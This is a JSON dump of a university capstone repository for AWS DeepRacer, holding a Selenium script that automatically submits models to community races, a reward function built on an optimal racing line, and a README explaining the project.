[ { "alpha_fraction": 0.6464226245880127, "alphanum_fraction": 0.6741541624069214, "avg_line_length": 35.42424392700195, "blob_id": "d715a151c59c0f0060d2e8c4c632b7841251762c", "content_id": "86c49cdc0a9501900ac5d479e5e72dff752d34f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3606, "license_type": "no_license", "max_line_length": 194, "num_lines": 99, "path": "/Selenium_Automation/lambda_function.py", "repo_name": "rheehot/Capstone_AWS_DeepRacer", "src_encoding": "UTF-8", "text": "import os, time, json\n\nfrom datetime import datetime, timedelta\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\n\nMODEL_NAME = \"Capstone-T1008-A7-A6\"\nSUBMIT_URL = \"https://console.aws.amazon.com/deepracer/home?region=us-east-1#competition/arn%3Aaws%3Adeepracer%3A%3A968005369378%3Aleaderboard%2F35b3d210-5aca-4f4e-8247-89f19fbf4d4a/submitModel\"\n\n\ndef get_driver():\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--window-size=1280x720')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--hide-scrollbars')\n chrome_options.add_argument('--enable-logging')\n chrome_options.add_argument('--log-level=0')\n chrome_options.add_argument('--v=99')\n chrome_options.add_argument('--single-process')\n chrome_options.add_argument('--homedir=/tmp')\n chrome_options.add_argument('--user-data-dir=/tmp/user-data')\n chrome_options.add_argument('--data-path=/tmp/data-path')\n chrome_options.add_argument('--disk-cache-dir=/tmp/cache-dir')\n chrome_options.add_argument('--ignore-certificate-errors')\n chrome_options.add_argument('user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36')\n chrome_options.binary_location = \"/opt/python/bin/headless-chromium\"\n\n driver = webdriver.Chrome('/opt/python/bin/chromedriver', chrome_options=chrome_options)\n return driver\n\n\n# Login AWS Console URL with IAM ID\ndef login_aws_console(browser):\n with open(\"AWS_credentials.txt\", 'r') as f:\n [aws_id, username, password] = f.read().splitlines()\n \n aws_id = str(aws_id)\n url = \"https://%s.signin.aws.amazon.com/console\" % aws_id\n\n browser.get(url)\n browser.refresh()\n time.sleep(3)\n\n usernameInput = browser.find_elements_by_css_selector('form input')[1]\n passwordInput = browser.find_elements_by_css_selector('form input')[2]\n\n usernameInput.send_keys(username)\n passwordInput.send_keys(password)\n passwordInput.send_keys(Keys.ENTER)\n time.sleep(2)\n\n print(f\"Successfully logged in to AWS account number {aws_id} with username {username}\")\n\n\n# Submit deepracer model to community races\ndef submit_model_to_community(browser):\n\n browser.get( SUBMIT_URL )\n browser.refresh()\n time.sleep(8)\n \n browser.find_element_by_xpath('//*[@id=\"awsui-select-0-textbox\"]' ).click()\n time.sleep(2)\n browser.find_element_by_xpath(\"//span[contains(@class, 'awsui-select-option-label') and text() = '\"+MODEL_NAME+\"']\").click()\n time.sleep(1)\n \n submitModelButton = browser.find_element_by_xpath('//button[@type=\"submit\"]/*[text()=\"Submit model\"]')\n\n re_press_submit = 5\n while re_press_submit > 0:\n try:\n submitModelButton.click()\n re_press_submit -= 1\n time.sleep(2)\n except:\n # If click failed, means that submit was successful and we got re-routed to Event starting screen\n 
re_press_submit = 0\n\n time.sleep(3)\n print(f\"[{(datetime.now() + timedelta(hours=9)).strftime('%Y-%m-%d %H:%M:%S')}] Submitted model : {MODEL_NAME}\")\n \n\ndef lambda_handler(event, context):\n print(\" ================ Starting Function ================ \")\n\n browser = get_driver()\n\n login_aws_console(browser)\n submit_model_to_community(browser)\n\n browser.quit()\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Submitted model' + MODEL_NAME)\n }\n" }, { "alpha_fraction": 0.29543665051460266, "alphanum_fraction": 0.4660643935203552, "avg_line_length": 48.50688171386719, "blob_id": "c4af4b3a38259617fca0cb488a54c5e58d6f2592", "content_id": "2fbddcb43a469c703c971c4bc1230c3f6f03e2d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21585, "license_type": "no_license", "max_line_length": 113, "num_lines": 436, "path": "/Reward_Function/reward_function.py", "repo_name": "rheehot/Capstone_AWS_DeepRacer", "src_encoding": "UTF-8", "text": "import math\n\n\nclass Reward:\n def __init__(self, verbose=False):\n self.first_racingpoint_index = 0 # None\n self.verbose = verbose\n\n def reward_function(self, params):\n\n # Import package (needed for heading)\n # import math\n\n ################## HELPER FUNCTIONS ###################\n\n def dist_2_points(x1, x2, y1, y2):\n return abs(abs(x1-x2)**2 + abs(y1-y2)**2)**0.5\n\n def closest_2_racing_points_index(racing_coords, car_coords):\n\n # Calculate all distances to racing points\n distances = []\n for i in range(len(racing_coords)):\n distance = dist_2_points(x1=racing_coords[i][0], x2=car_coords[0],\n y1=racing_coords[i][1], y2=car_coords[1])\n distances.append(distance)\n\n # Get index of the closest racing point\n closest_index = distances.index(min(distances))\n\n # Get index of the second closest racing point\n distances_no_closest = distances.copy()\n distances_no_closest[closest_index] = 999\n second_closest_index = distances_no_closest.index(\n min(distances_no_closest))\n\n return [closest_index, second_closest_index]\n\n def dist_to_racing_line(closest_coords, second_closest_coords, car_coords):\n\n # Calculate the distances between 2 closest racing points\n a = abs(dist_2_points(x1=closest_coords[0],\n x2=second_closest_coords[0],\n y1=closest_coords[1],\n y2=second_closest_coords[1]))\n\n # Distances between car and closest and second closest racing point\n b = abs(dist_2_points(x1=car_coords[0],\n x2=closest_coords[0],\n y1=car_coords[1],\n y2=closest_coords[1]))\n c = abs(dist_2_points(x1=car_coords[0],\n x2=second_closest_coords[0],\n y1=car_coords[1],\n y2=second_closest_coords[1]))\n\n # Calculate distance between car and racing line (goes through 2 closest racing points)\n # try-except in case a=0 (rare bug in DeepRacer)\n try:\n distance = abs(-(a**4) + 2*(a**2)*(b**2) + 2*(a**2)*(c**2) -\n (b**4) + 2*(b**2)*(c**2) - (c**4))**0.5 / (2*a)\n except:\n distance = b\n\n return distance\n\n # Calculate which one of the closest racing points is the next one and which one the previous one\n def next_prev_racing_point(closest_coords, second_closest_coords, car_coords, heading):\n\n # Virtually set the car more into the heading direction\n heading_vector = [math.cos(math.radians(\n heading)), math.sin(math.radians(heading))]\n new_car_coords = [car_coords[0]+heading_vector[0],\n car_coords[1]+heading_vector[1]]\n\n # Calculate distance from new car coords to 2 closest racing points\n distance_closest_coords_new = dist_2_points(x1=new_car_coords[0],\n 
x2=closest_coords[0],\n y1=new_car_coords[1],\n y2=closest_coords[1])\n distance_second_closest_coords_new = dist_2_points(x1=new_car_coords[0],\n x2=second_closest_coords[0],\n y1=new_car_coords[1],\n y2=second_closest_coords[1])\n\n if distance_closest_coords_new <= distance_second_closest_coords_new:\n next_point_coords = closest_coords\n prev_point_coords = second_closest_coords\n else:\n next_point_coords = second_closest_coords\n prev_point_coords = closest_coords\n\n return [next_point_coords, prev_point_coords]\n\n def racing_direction_diff(closest_coords, second_closest_coords, car_coords, heading):\n\n # Calculate the direction of the center line based on the closest waypoints\n next_point, prev_point = next_prev_racing_point(closest_coords,\n second_closest_coords,\n car_coords,\n heading)\n\n # Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians\n track_direction = math.atan2(\n next_point[1] - prev_point[1], next_point[0] - prev_point[0])\n\n # Convert to degree\n track_direction = math.degrees(track_direction)\n\n # Calculate the difference between the track direction and the heading direction of the car\n direction_diff = abs(track_direction - heading)\n if direction_diff > 180:\n direction_diff = 360 - direction_diff\n\n return direction_diff\n\n # Gives back indexes that lie between start and end index of a cyclical list\n # (start index is included, end index is not)\n def indexes_cyclical(start, end, array_len):\n\n if end < start:\n end += array_len\n\n return [index % array_len for index in range(start, end)]\n\n # Calculate how long car would take for entire lap, if it continued like it did until now\n def projected_time(first_index, closest_index, step_count, times_list):\n\n # Calculate how much time has passed since start\n current_actual_time = (step_count-1) / 15\n\n # Calculate which indexes were already passed\n indexes_traveled = indexes_cyclical(\n first_index, closest_index, len(times_list))\n\n # Calculate how much time should have passed if car would have followed optimals\n current_expected_time = sum(\n [times_list[i] for i in indexes_traveled])\n\n # Calculate how long one entire lap takes if car follows optimals\n total_expected_time = sum(times_list)\n\n # Calculate how long car would take for entire lap, if it continued like it did until now\n try:\n projected_time = (current_actual_time /\n current_expected_time) * total_expected_time\n except:\n projected_time = 9999\n\n return projected_time\n\n #################### RACING LINE ######################\n\n # Optimal racing line for the Spain track\n # Each row: [x,y,speed,timeFromPreviousPoint]\n racing_track = [[0.62634, 2.8074, 1.39727, 0.08294],\n [0.63146, 2.69136, 1.39727, 0.08313],\n [0.64573, 2.57592, 1.39727, 0.08325],\n [0.6693, 2.46191, 1.39727, 0.08332],\n [0.70225, 2.35016, 1.39793, 0.08334],\n [0.74435, 2.24144, 1.30233, 0.08952],\n [0.79504, 2.13627, 1.1967, 0.09756],\n [0.8534, 2.03486, 1.1967, 0.09777],\n [0.9192, 1.93766, 1.1967, 0.09808],\n [0.99249, 1.84529, 1.1967, 0.09854],\n [1.0736, 1.75861, 1.1967, 0.0992],\n [1.16374, 1.67942, 1.1967, 0.10026],\n [1.26415, 1.6102, 1.5021, 0.08119],\n [1.37092, 1.54793, 1.67335, 0.07386],\n [1.48281, 1.49161, 1.88198, 0.06656],\n [1.5988, 1.44025, 2.07512, 0.06113],\n [1.71827, 1.39312, 2.33596, 0.05498],\n [1.84068, 1.34942, 2.5, 0.05199],\n [1.96573, 1.30848, 2.5, 0.05263],\n [2.09321, 1.26959, 2.5, 0.05331],\n [2.22333, 1.23214, 2.5, 0.05416],\n [2.35625, 1.19189, 2.5, 0.05555],\n [2.4887, 1.14987, 2.5, 
0.05558],\n [2.62059, 1.10626, 2.5, 0.05557],\n [2.75193, 1.0611, 2.5, 0.05555],\n [2.88273, 1.01446, 2.5, 0.05555],\n [3.01302, 0.96644, 2.5, 0.05554],\n [3.14289, 0.91728, 2.5, 0.05555],\n [3.27245, 0.86725, 2.34643, 0.05919],\n [3.40179, 0.81664, 2.14705, 0.06469],\n [3.52534, 0.76803, 1.99968, 0.0664],\n [3.64883, 0.72099, 1.88636, 0.07005],\n [3.77225, 0.67658, 1.79873, 0.07292],\n [3.89566, 0.63577, 1.73281, 0.07501],\n [4.01913, 0.59935, 1.68666, 0.07632],\n [4.14273, 0.56803, 1.6591, 0.07686],\n [4.26652, 0.5424, 1.64913, 0.07666],\n [4.39051, 0.52303, 1.64913, 0.07609],\n [4.51466, 0.51041, 1.64913, 0.07567],\n [4.6389, 0.50498, 1.64913, 0.07541],\n [4.76312, 0.50709, 1.64913, 0.07534],\n [4.8872, 0.517, 1.64913, 0.07548],\n [5.01096, 0.53487, 1.65562, 0.07553],\n [5.13423, 0.56074, 1.67726, 0.07509],\n [5.2568, 0.59459, 1.71258, 0.07425],\n [5.37847, 0.63625, 1.75997, 0.07307],\n [5.49902, 0.68552, 1.81781, 0.07164],\n [5.61825, 0.74209, 1.88447, 0.07003],\n [5.73595, 0.80562, 1.95841, 0.0683],\n [5.85194, 0.87573, 2.03816, 0.0665],\n [5.96605, 0.95201, 2.12234, 0.06467],\n [6.07813, 1.03404, 2.20965, 0.06286],\n [6.18805, 1.1214, 2.29886, 0.06108],\n [6.2957, 1.21366, 2.38874, 0.05935],\n [6.40099, 1.31043, 2.47805, 0.05771],\n [6.50386, 1.41132, 2.5, 0.05764],\n [6.60426, 1.51598, 2.5, 0.05801],\n [6.70214, 1.62407, 2.5, 0.05833],\n [6.79747, 1.73528, 2.5, 0.05859],\n [6.89022, 1.84935, 2.5, 0.05881],\n [6.98037, 1.96604, 2.5, 0.05898],\n [7.06789, 2.08511, 2.5, 0.05911],\n [7.15274, 2.20639, 2.5, 0.0592],\n [7.23487, 2.32968, 2.5, 0.05926],\n [7.31419, 2.45484, 2.5, 0.05927],\n [7.39063, 2.58173, 2.5, 0.05925],\n [7.46407, 2.7102, 2.5, 0.05919],\n [7.53435, 2.84012, 2.47291, 0.05973],\n [7.6013, 2.97136, 2.36324, 0.06234],\n [7.66469, 3.10378, 2.25264, 0.06517],\n [7.72428, 3.23722, 2.14496, 0.06813],\n [7.77975, 3.37151, 2.04552, 0.07103],\n [7.83077, 3.50645, 1.9619, 0.07353],\n [7.87697, 3.6418, 1.90522, 0.07507],\n [7.91792, 3.77731, 1.88858, 0.07496],\n [7.95321, 3.91267, 1.8494, 0.07564],\n [7.9824, 4.04755, 1.80772, 0.07634],\n [8.00509, 4.18158, 1.67543, 0.08114],\n [8.02097, 4.31442, 1.54118, 0.08681],\n [8.02995, 4.44574, 1.41123, 0.09328],\n [8.03221, 4.57534, 1.27802, 0.10142],\n [8.02777, 4.70297, 1.14629, 0.1114],\n [8.01662, 4.82837, 1.0, 0.1259],\n [7.99802, 4.95103, 1.0, 0.12406],\n [7.97105, 5.07025, 1.0, 0.12223],\n [7.93463, 5.18511, 1.0, 0.12049],\n [7.88732, 5.29429, 1.0, 0.11899],\n [7.82726, 5.39584, 1.0, 0.11798],\n [7.75161, 5.48603, 1.11159, 0.1059],\n [7.66434, 5.56576, 1.21676, 0.09715],\n [7.56798, 5.63587, 1.33698, 0.08913],\n [7.46452, 5.69731, 1.42122, 0.08466],\n [7.35516, 5.75051, 1.50371, 0.08088],\n [7.24086, 5.79585, 1.56313, 0.07866],\n [7.12237, 5.83347, 1.6121, 0.07711],\n [7.00035, 5.86342, 1.65126, 0.07609],\n [6.87539, 5.88568, 1.68113, 0.0755],\n [6.74809, 5.90022, 1.70592, 0.07511],\n [6.61903, 5.90698, 1.72741, 0.07481],\n [6.4888, 5.90593, 1.74694, 0.07455],\n [6.35798, 5.89709, 1.75586, 0.07467],\n [6.22714, 5.8805, 1.75586, 0.07511],\n [6.09685, 5.85604, 1.80186, 0.07357],\n [5.96758, 5.82418, 1.80186, 0.07389],\n [5.83982, 5.78483, 1.82574, 0.07322],\n [5.71395, 5.73825, 1.85955, 0.07217],\n [5.5903, 5.68472, 1.9052, 0.07072],\n [5.46907, 5.62464, 1.9671, 0.06878],\n [5.35038, 5.55844, 2.05108, 0.06626],\n [5.23424, 5.48663, 2.1652, 0.06306],\n [5.12056, 5.40981, 2.32107, 0.05911],\n [5.00914, 5.32863, 2.5, 0.05514],\n [4.89973, 5.24377, 2.5, 0.05538],\n [4.79201, 5.15593, 2.45112, 0.0567],\n [4.68576, 5.06561, 2.24857, 
0.06202],\n [4.58079, 4.97316, 2.0831, 0.06715],\n [4.48082, 4.88243, 1.96125, 0.06884],\n [4.3796, 4.7942, 1.87697, 0.07154],\n [4.27684, 4.70907, 1.82611, 0.07307],\n [4.17225, 4.6277, 1.80653, 0.07336],\n [4.06554, 4.55072, 1.80653, 0.07284],\n [3.95644, 4.47878, 1.80653, 0.07234],\n [3.84475, 4.41244, 1.80653, 0.07191],\n [3.73031, 4.35215, 1.80653, 0.0716],\n [3.61306, 4.29823, 1.80653, 0.07144],\n [3.49301, 4.25081, 1.81793, 0.071],\n [3.37024, 4.20987, 1.86222, 0.0695],\n [3.24492, 4.17519, 1.94392, 0.06689],\n [3.11726, 4.14637, 2.06986, 0.06323],\n [2.98756, 4.12284, 2.24238, 0.05879],\n [2.85611, 4.10393, 2.43216, 0.0546],\n [2.72319, 4.08902, 2.5, 0.0535],\n [2.58903, 4.07761, 2.45689, 0.0548],\n [2.45387, 4.06945, 2.25692, 0.06],\n [2.31818, 4.06426, 2.07663, 0.06539],\n [2.18532, 4.05625, 1.90257, 0.06996],\n [2.05434, 4.04515, 1.72418, 0.07624],\n [1.92525, 4.03072, 1.53015, 0.08489],\n [1.7982, 4.01267, 1.36907, 0.09374],\n [1.67349, 3.99052, 1.21821, 0.10397],\n [1.55151, 3.96372, 1.07012, 0.11671],\n [1.43274, 3.93163, 1.02891, 0.11957],\n [1.31783, 3.89345, 1.02891, 0.11768],\n [1.20781, 3.84796, 1.02891, 0.11571],\n [1.10389, 3.79392, 1.02891, 0.11383],\n [1.00783, 3.72983, 1.02891, 0.11223],\n [0.92249, 3.6538, 1.02891, 0.11109],\n [0.84978, 3.56631, 1.13536, 0.1002],\n [0.78832, 3.47061, 1.20876, 0.0941],\n [0.73744, 3.36858, 1.26738, 0.08996],\n [0.69672, 3.26166, 1.34505, 0.08506],\n [0.66544, 3.15118, 1.38395, 0.08297],\n [0.6434, 3.03808, 1.39727, 0.08247],\n [0.63046, 2.92322, 1.39727, 0.08273]]\n\n ################## INPUT PARAMETERS ###################\n\n # Read all input parameters\n all_wheels_on_track = params['all_wheels_on_track']\n x = params['x']\n y = params['y']\n distance_from_center = params['distance_from_center']\n is_left_of_center = params['is_left_of_center']\n heading = params['heading']\n progress = params['progress']\n steps = params['steps']\n speed = params['speed']\n steering_angle = params['steering_angle']\n track_width = params['track_width']\n waypoints = params['waypoints']\n closest_waypoints = params['closest_waypoints']\n is_offtrack = params['is_offtrack']\n\n ############### OPTIMAL X,Y,SPEED,TIME ################\n\n # Get closest indexes for racing line (and distances to all points on racing line)\n closest_index, second_closest_index = closest_2_racing_points_index(\n racing_track, [x, y])\n\n # Get optimal [x, y, speed, time] for closest and second closest index\n optimals = racing_track[closest_index]\n optimals_second = racing_track[second_closest_index]\n\n # Save first racingpoint of episode for later\n if self.verbose == True:\n self.first_racingpoint_index = 0 # this is just for testing purposes\n if steps == 1:\n self.first_racingpoint_index = closest_index\n\n ################ REWARD AND PUNISHMENT ################\n\n ## Define the default reward ##\n reward = 1\n\n ## Reward if car goes close to optimal racing line ##\n DISTANCE_MULTIPLE = 1\n dist = dist_to_racing_line(optimals[0:2], optimals_second[0:2], [x, y])\n distance_reward = max(1e-3, 1 - (dist/(track_width*0.5)))\n reward += distance_reward * DISTANCE_MULTIPLE\n\n ## Reward if speed is close to optimal speed ##\n SPEED_DIFF_NO_REWARD = 1\n SPEED_MULTIPLE = 2\n speed_diff = abs(optimals[2]-speed)\n if speed_diff <= SPEED_DIFF_NO_REWARD:\n # we use quadratic punishment (not linear) bc we're not as confident with the optimal speed\n # so, we do not punish small deviations from optimal speed\n speed_reward = (1 - (speed_diff/(SPEED_DIFF_NO_REWARD))**2)**2\n 
else:\n            speed_reward = 0\n        reward += speed_reward * SPEED_MULTIPLE\n\n        # Reward if less steps\n        REWARD_PER_STEP_FOR_FASTEST_TIME = 1\n        STANDARD_TIME = 16\n        FASTEST_TIME = 8\n        times_list = [row[3] for row in racing_track]\n        projected_time = projected_time(\n            self.first_racingpoint_index, closest_index, steps, times_list)\n        try:\n            steps_prediction = projected_time * 15 + 1\n            reward_prediction = max(1e-3, (-REWARD_PER_STEP_FOR_FASTEST_TIME*(FASTEST_TIME) /\n                                           (STANDARD_TIME-FASTEST_TIME))*(steps_prediction-(STANDARD_TIME*15+1)))\n            steps_reward = min(REWARD_PER_STEP_FOR_FASTEST_TIME,\n                               reward_prediction / steps_prediction)\n        except:\n            steps_reward = 0\n        reward += steps_reward\n\n        # Zero reward if obviously wrong direction (e.g. spin)\n        direction_diff = racing_direction_diff(\n            optimals[0:2], optimals_second[0:2], [x, y], heading)\n        if direction_diff > 30:\n            reward = 1e-3\n\n        # Zero reward if obviously too slow\n        speed_diff_zero = optimals[2]-speed\n        if speed_diff_zero > 0.5:\n            reward = 1e-3\n\n        ## Incentive for finishing the lap in less steps ##\n        # should be adapted to track length and other rewards\n        REWARD_FOR_FASTEST_TIME = 500\n        STANDARD_TIME = 16  # seconds (time that is easily done by model)\n        FASTEST_TIME = 8  # seconds (best time of 1st place on the track)\n        if progress > 99.5 :\n            finish_reward = max(1e-3, (-REWARD_FOR_FASTEST_TIME /\n                      (15*(STANDARD_TIME-FASTEST_TIME)))*(steps-STANDARD_TIME*15))\n        else:\n            finish_reward = 0\n        reward += finish_reward\n\n        ## Zero reward if off track ##\n        if all_wheels_on_track == False:\n            reward = 1e-3\n\n        ####################### VERBOSE #######################\n\n        if self.verbose == True:\n            print(\"Closest index: %i\" % closest_index)\n            print(\"Distance to racing line: %f\" % dist)\n            print(\"=== Distance reward (w/out multiple): %f ===\" % (distance_reward))\n            print(\"Optimal speed: %f\" % optimals[2])\n            print(\"Speed difference: %f\" % speed_diff)\n            print(\"=== Speed reward (w/out multiple): %f ===\" % speed_reward)\n            print(\"Direction difference: %f\" % direction_diff)\n            print(\"Predicted time: %f\" % projected_time)\n            print(\"=== Steps reward: %f ===\" % steps_reward)\n            print(\"=== Finish reward: %f ===\" % finish_reward)\n\n        #################### RETURN REWARD ####################\n\n        # Always return a float value\n        return float(reward)\n\n\nreward_object = Reward()  # add parameter verbose=True to get noisy output for testing\n\n\ndef reward_function(params):\n    return reward_object.reward_function(params)\n" }, { "alpha_fraction": 0.7238193154335022, "alphanum_fraction": 0.7484599351882935, "avg_line_length": 66.13793182373047, "blob_id": "7051ac2578d7c79fdd6282c64197ab4106880323", "content_id": "e0612cf9a73760a8714066a0e6462ce9f7216edd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3098, "license_type": "no_license", "max_line_length": 244, "num_lines": 29, "path": "/README.md", "repo_name": "rheehot/Capstone_AWS_DeepRacer", "src_encoding": "UTF-8", "text": "\n\n*For use by AWSKRUG, this has been switched to the default ReInvent2019 data.\nSee the original GitHub repo and blog below; this was roughly translated with Google Translate.
Replace the `action_space` in `dummy-model-for-import/model/model_metadata.json` with your computed values, \nupload the whole dummy-model-for-import folder to S3, run import_model, then clone the model before using it.\nThe `reward function` and `hyperparameter` values can be changed when you clone the model.*\n\n[Original GitHub](https://github.com/dgnzlz/Capstone_AWS_DeepRacer) , [Explanatory blog](https://towardsdatascience.com/an-advanced-guide-to-aws-deepracer-2b462c37eea)\n\n----\n# Capstone Project : for the Master in Business Analytics at ESADE Business School\n\n**This repository contains the code used in the article \"An Advanced Guide to AWS DeepRacer - Autonomous Formula 1 Racing using Reinforcement Learning\". Please [click here](https://towardsdatascience.com/an-advanced-guide-to-aws-deepracer-2b462c37eea) first and read the blog post.**\n\n\n- `Compute_Speed_And_Actions` folder : contains jupyter notebooks that take the optimal racing line from [this](https://github.com/cdthompson/deepracer-k1999-race-lines) repository and compute the optimal speeds. \nThey also compute a custom action space using K-Means clustering. This folder also contains cdthompson's K1999 racing-line notebook, changed so that only the inner `80 %` of the track is used.\n- `Reward_Function` folder : ~~contains the .py file with the reward function our team used to place 12th out of 1291 time-trial participants in the May 2020 F1 event.~~\n ==> *For demonstration purposes it has been **replaced with the default ReInvent2019 data**. This is the default data, not the optimized data. For the original data, please check [the original GitHub repo](https://github.com/dgnzlz/Capstone_AWS_DeepRacer).*\n- `Selenium_Automation` folder : contains a jupyter notebook that lets you submit a model to a race many times without using the AWS CLI. As a bonus, it can also run hyperparameter experiments automatically. It can be used to run several experiments overnight without having to set them up manually every few hours.\n\n## GitHub repositories used\n- Computing the optimal racing line : https://github.com/cdthompson/deepracer-k1999-race-lines\n- Log analysis : https://github.com/aws-deepracer-community/deepracer-analysis\n- Track data retrieval : https://github.com/aws-deepracer-community/deepracer-simapp/tree/master/bundle/deepracer_simulation_environment/share/deepracer_simulation_environment/routes\n\n## License\nFeel free to use, distribute, and change the code as you wish.\n\nThis is a completed university project, so we will not be maintaining the code any further." } ]
3
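The README above says to paste the computed `action_space` into `dummy-model-for-import/model/model_metadata.json` before uploading the folder to S3. A sketch of writing such a file from Python; the two actions below are placeholders, not values computed by the notebooks:

```python
import json

# Placeholder action space -- real entries come from the K-Means notebook's output.
model_metadata = {
    "action_space": [
        {"steering_angle": -20.0, "speed": 1.2, "index": 0},
        {"steering_angle": 20.0, "speed": 1.2, "index": 1},
    ],
}

with open("dummy-model-for-import/model/model_metadata.json", "w") as f:
    json.dump(model_metadata, f, indent=4)
```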
shenrenguo/gt-api
https://github.com/shenrenguo/gt-api
698766d5bec501d9324786ec85d42a27b6996594
2fb1179dbaa7bb8f26564aa6d448084c34e70567
940151c85acf4724664965988788861098dc856c
refs/heads/master
2016-08-05T15:01:30.109970
2013-12-25T07:50:48
2013-12-25T07:50:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5674415230751038, "alphanum_fraction": 0.5713276267051697, "avg_line_length": 24.228164672851562, "blob_id": "dec83855111edbb7d00e0d5e7260dbd358582d48", "content_id": "e64fb4d6143789ee9c19a475c62976e8439df2f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14153, "license_type": "no_license", "max_line_length": 116, "num_lines": 561, "path": "/gt.py", "repo_name": "shenrenguo/gt-api", "src_encoding": "UTF-8", "text": "# coding=utf-8\nfrom datetime import *\nfrom flask import Flask, jsonify, request\nfrom functools import wraps\nfrom pymongo import *\n\n# mongodb configuration\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017\nMONGODB_DB = 'GT'\n\n# create the application object\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# connect to the database\nconnection = Connection(app.config['MONGODB_HOST'], app.config['MONGODB_PORT'])\ndb = connection[app.config['MONGODB_DB']]\n\n\[email protected](401)\ndef not_authorization():\n message = {\n \"status\": 401,\n \"message\": \"Not Authorization: \" + request.url,\n }\n r = jsonify(message)\n r.status_code = 401\n return r\n\n\[email protected](404)\ndef not_found():\n message = {\n \"status\": 404,\n \"message\": \"Not Found: \" + request.url,\n }\n r = jsonify(message)\n r.status_code = 404\n return r\n\n\[email protected](500)\ndef internal_error(error=None):\n message = {\n \"status\": 500,\n \"message\": \"Internal server error.\",\n }\n r = jsonify(message)\n r.status_code = 500\n return r\n\n\ndef check_auth(uid, pwd):\n \"\"\"This function is called to check if a username /\n password combination is valid.\n \"\"\"\n u = db.users.find_one({\"$or\": [{\"_id\": uid}, {\"email\": uid}]})\n return (u is not None) and (u.get(\"pwd\", None) == pwd)\n\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.authorization\n if not auth or not check_auth(auth.username, auth.password):\n return not_authorization()\n return f(*args, **kwargs)\n return decorated\n\n\[email protected]('/')\n@requires_auth\ndef index():\n return jsonify(ok=True)\n\n\[email protected]('/sign/<uid>,<email>,<pwd>,<nick>')\ndef new_user(uid, email, pwd, nick):\n \"\"\" sign a new user.\n @param uid:\n @param email:\n @param pwd:\n @param nick:\n \"\"\"\n u = {\"_id\": uid, \"email\": email, \"pwd\": pwd, \"nick\": nick}\n db.users.insert(u)\n\n return jsonify(u)\n\n\[email protected]('/login/<uid>,<pwd>')\ndef login(uid, pwd):\n \"\"\"user login\n\n @param uid: userId or email\n @param pwd:\n @return:\n \"\"\"\n u = db.users.find_one({\"$or\": [{\"_id\": uid}, {\"email\": uid}]})\n\n if u is None:\n return not_authorization()\n if u.get(\"pwd\", None) != pwd:\n return not_authorization()\n\n return jsonify()\n\n\[email protected]('/users')\ndef get_all_users():\n \"\"\"get all users\n\n @return:\n \"\"\"\n cursor_u = db.users.find({}, {\"email\": 1, \"nick\": 1}).sort(\"_id\", ASCENDING)\n users = [u for u in cursor_u]\n cursor_u.close()\n\n return jsonify(result_set=users)\n\n\[email protected]('/groups/add/<uid>,<title>,<brief>')\ndef new_group(uid, title, brief):\n \"\"\"add a new group\n\n @param uid: user id of the owner\n @param title: title of group\n @param brief: brief of group\n @return:\n \"\"\"\n g = {\"_id\": get_serial_id(\"serial_group\"), \"title\": title, \"brief\": brief, \"uid\": uid, \"members\": [uid]}\n db.groups.insert(g)\n\n return jsonify(g)\n\n\[email protected]('/groups/upd/<int:gid>,<title>,<brief>')\ndef 
update_group(gid, title, brief):\n \"\"\"update group specified.\n\n @param gid: group id of specified group\n @param title: the new title of group\n @param brief: the new brief of group\n @return:\n \"\"\"\n db.groups.update({\"_id\": gid}, {\"$set\": {\"title\": title, \"brief\": brief}})\n\n return jsonify()\n\n\[email protected]('/groups/del/<int:gid>')\ndef delete_group(gid):\n \"\"\"delete the specified group\n\n @param gid: id of group to be delete\n @return:\n \"\"\"\n db.groups.remove({\"_id\": gid})\n\n return jsonify()\n\n\[email protected]('/groups/add_member/<int:gid>,<uid>')\ndef add_group_member(gid, uid):\n \"\"\"add a member user to a group\n\n @param gid: group id\n @param uid: user ids split by \",\" to be add\n @return:\n \"\"\"\n db.groups.update({\"_id\": gid}, {\"$addToSet\": {\"members\": {\"$each\": uid.split(',')}}})\n\n return jsonify()\n\n\[email protected]('/groups/del_member/<int:gid>,<uid>')\ndef delete_group_member(gid, uid):\n \"\"\"delete a member from a group\n\n @param gid: group id\n @param uid: user ids split by \"\", to be delete\n @return:\n \"\"\"\n for u in uid.split(','):\n db.groups.update({\"_id\": gid}, {\"$pull\": {\"members\": u}})\n\n return jsonify()\n\n\[email protected]('/groups/<int:gid>/members')\ndef get_group_members(gid):\n \"\"\"get members of group specified.\n\n @param gid: group id\n @return:\n \"\"\"\n g = db.groups.find_one({\"_id\": gid})\n\n members = []\n cursor_u = db.users.find({\"_id\": {\"$in\": g.get(\"members\", [])}}, {\"email\": 1, \"nick\": 1})\n for u in cursor_u:\n members.append(u)\n cursor_u.close()\n\n return jsonify(result_set=members)\n\n\[email protected]('/groups')\ndef get_all_groups():\n \"\"\"get all groups\n\n @return:\n \"\"\"\n groups = []\n cursor_g = db.groups.find({}, {\"title\": 1, \"brief\": 1, \"uid\": 1}).sort(\"title\", ASCENDING)\n for g in cursor_g:\n groups.append(g)\n cursor_g.close()\n\n return jsonify(result_set=groups)\n\n\[email protected]('/<uid>/groups')\ndef get_user_groups(uid):\n \"\"\"get the user owned & joined groups\n\n @param uid:\n @return:\n \"\"\"\n groups_owned = []\n groups_joined = []\n cursor_g = db.groups.find({\"members\": uid}, {\"members\": 0}).sort(\"title\", ASCENDING)\n for g in cursor_g:\n if g.get(\"uid\", None) == uid:\n groups_owned.append(g)\n else:\n groups_joined.append(g)\n 